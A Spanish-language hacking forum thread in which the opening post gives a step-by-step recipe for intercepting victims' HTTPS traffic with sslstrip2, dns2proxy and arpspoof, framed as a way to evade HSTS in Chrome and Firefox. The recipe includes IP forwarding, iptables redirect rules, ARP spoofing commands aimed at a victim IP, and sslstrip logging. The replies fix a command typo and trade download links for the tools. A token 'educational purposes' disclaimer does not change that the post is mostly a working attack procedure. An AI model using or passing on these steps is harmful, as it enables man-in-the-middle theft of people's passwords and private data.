Evadiendo HSTS en CHROME y FIREFOX con sslstrip2

Iniciado por denx0, Diciembre 01, 2014, 03:55:50 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Diciembre 01, 2014, 03:55:50 PM Ultima modificación: Noviembre 13, 2016, 08:10:50 PM por puntoCL

Había una vez, hace no mucho tiempo. Un mundo en el que la información transmitida por Internet viajaba en texto plano, Por lo cual  cualquier sniffer como cain, ettercap, etc podían Fácilmente  interceptar tu información, obtener tus contraseñas de facebook, hotmail, gmail y espiarte a diestra y siniestra.

Para mitigar este gran problema de seguridad decidieron implementar un protocolo mucho mas seguro llamado HTTPS que lo que hace es cifrar la información en SSL. En poco tiempo muchas paginas importantes como entidades bancarias, Paginas de servicios, gmail, hotmail, facebook, etc,  Migraron a este protocolo.

Por un tiempo todo funcionó a la perfección. nadie podía sniffear los datos de las paginas cifradas en HTTPS. pero eso cambió en 2009 cuando en una conferencia llamada Black Hat se presentó una herramienta bastante curiosa llamada SSLSTRIP... ¿Que hace esta Herramienta?.
Lo que hace es que reemplaza todas las peticiones HTTPS A HTTP y luego hace MITM entre el cliente y servidor, permitiendo al atacante abolir el protocolo HTTPS y hacer que los datos viajen en texto plano.

Por años se podían sniffear los datos de las paginas aun en HTTPS, por eso es que después 
se implementó un nuevo mecanismo de política de seguridad llamado HSTS que lo que hace es que informa al navegador que las conexiones siempre se deben dar bajo SSL/TLS, esta medida de seguridad fue implementada en muchas paginas web pero no solo eso, con el paso del tiempo los navegadores CHROME y FIREFOX incluyeron esta política en sus navegadores  por lo que la herramienta SSLSTRIP dejó de ser efectiva para estos navegadores, Solo seguía  funcionando en Internet explorer.

Pero hace unos meses LeonardoNve lanzó una versión modificada de SSLSTRIP a la cual llamó "SSLSTRIP2" . Esta nueva versión permite evadir las normas de seguridad HSTS y con la ayuda de otra herramienta llamada dns2proxy Permite hacer lo que hasta hoy era imposible: Sniffear conexiones en navegadores como FIREFOX y CHROME.

A continuación te muestro como llevar a cabo esta técnica no sin antes recordarte que esto es con fines Educativos.

Lo primero que necesitaras serán las 2 herramientas antes mencionadas sslstrip2 y dns2proxy
las 2 las puedes descargar directamente desde aquí:

sslstrip2
Código: php
 https://github.com/byt3bl33d3r/sslstrip2


dns2proxy
Código: php
 https://github.com/LeonardoNve/dns2proxy


una vez descomprimidas puedes escoger entre Instalar sslstrip2 o Ejecutarla directamente

Para instalarlo solo basta ejecutar el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta de la siguiente manera:

Código: php
 python setup.py install


si tenías una versión anterior la remplazará.

Ahora si comencemos el Ataque:

Primero necesitamos activar el ip forward con el siguiente comando:

Código: php
echo "1" > /proc/sys/net/ipv4/ip_forward


agregamos estas reglas de iptables:

Código: php
iptables --flush


Código: php
iptables --flush -t nat 


Código: php
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000


Código: php
iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53


Iniciamos arpspoof

Código: php
arpspoof -i eth0 -t IP-VICTIMA IP-GATEWAY

Código: php
arpspoof -i eth0 -t GATEWAY IP-VICTIMA


Una vez hecho eso solo es cuestión de iniciar sslstrip

Código: php
sslstrip -l 9000 -a -w log.txt


y por ultimo para que funcione el ataque debemos de correr dns2proxy que crea un falso servidor DNS e interactua con iptables para reenviar las conecciónes:

Código: php
python dns2proxy


listo .. con esto toda la información del objetivo llegará a nosotros en texto plano.

solo queda abrir el archivo log.txt que generó sslstrip y ahí estará toda la información.

Aquí les dejo un vídeo del proceso.
saludos y Happy hacking
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Buen post +Karma
Pentest - Hacking & Security Services

Contact me: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Muy buen aporte denx0, espero seguir viéndote por el foro :)

Un saludo.



Muchas gracias, pero al ingresar el comando

iptables --flush -t -nat

me dice:

iptables v1.4.14: can't initialize iptables table `-nat': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.

Tengo Kali completamente actualizado, saludos.

cierto .. un pequeño error de redacción  :P: antes de nat no lleva "-"

quedaría así: iptables --flush -t nat

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hola Amigos... probe la primer version de sslstrip y funciona solo c explorer...
estuve probando el 2  pero no me funciona.. puede ser q ya no funcione actualmente?

   espero su respuesta!
Es irrevocable el paso de átomos a bits.

.
Abril 22, 2015, 04:05:49 PM #8 Ultima modificación: Marzo 02, 2024, 09:03:58 AM por 45sa54sa
.

Hola DENX0, de casualidad tendras el .zip del sslstrip2, sinceramente no logro encontrarlo. saludos y buen trabajo :)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola DENX0, de casualidad tendras el .zip del sslstrip2, sinceramente no logro encontrarlo. saludos y buen trabajo :)

Jaja decime que es joda xD... No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

La próxima podrías buscarlo un poco mejor. Lo digo por esto:








Espero que te sirva.

Saludos!
WhiZ


.
Abril 26, 2015, 06:04:17 PM #11 Ultima modificación: Marzo 02, 2024, 09:03:51 AM por 45sa54sa
.

Abril 27, 2015, 06:51:14 PM #12 Ultima modificación: Abril 27, 2015, 06:58:21 PM por n4pst3r
Estimado WHIZ, si te das de cuenta el autor borro la herramienta y el link que publicaste no descarga nada respecto a la herramienta, la he buscado antes de que me dijeras, por tal motivo   publique. xD sin embargo Gracias por responder, Saludos

Dejo link con la tool No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Estimado WHIZ, si te das de cuenta el autor borro la herramienta y el link que publicaste no descarga nada respecto a la herramienta, la he buscado antes de que me dijeras, por tal motivo   publique. xD sin embargo Gracias por responder, Saludos

Dejo link con la tool No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Jaja mil disculpas por mi respuesta estúpida y arrogante. No suelo responder así. Ahora estoy pagando por mi mala conducta.

Saludos y gracias por la enseñanza! xD
WhiZ


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Estimado WHIZ, si te das de cuenta el autor borro la herramienta y el link que publicaste no descarga nada respecto a la herramienta, la he buscado antes de que me dijeras, por tal motivo   publique. xD sin embargo Gracias por responder, Saludos

Dejo link con la tool No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Jaja mil disculpas por mi respuesta estúpida y arrogante. No suelo responder así. Ahora estoy pagando por mi mala conducta.

Saludos y gracias por la enseñanza! xD
WhiZ


Cita de: IJ0]SEE link=topic=23937.msg86582#msg86582 date=1429729549]
Pasa link para descargar que este tio lo ha retirado

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola DENX0, de casualidad tendras el .zip del sslstrip2, sinceramente no logro encontrarlo. saludos y buen trabajo :)

Aquí lo teneis: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un saludo.



Hola, algun link donde pueda bajar dns2proxy?

Gracias!

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, fijate si te sirve:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos!
ANTRAX


El problema es que ese link esta vacio, no esta más el dns2proxy para bajarlo!
Dice: NO MORE OPEN DISCLOSURE... tuvo que borrar el repositorio.
Algun otro lugar de donde poder bajarlo??

Gracias!

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, fijate desde acá entonces:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos!
ANTRAX


¿Las herramientas que mencionas solo funcionan bajo Linux o alguna de sus distribuciones?¿Este tipo de ataques están dirigidos hacia una máquina , en qué parte de los comandos se establece dicha máquina , es decir su IP o algún otro rasgo diferenciador?

Un saludo :)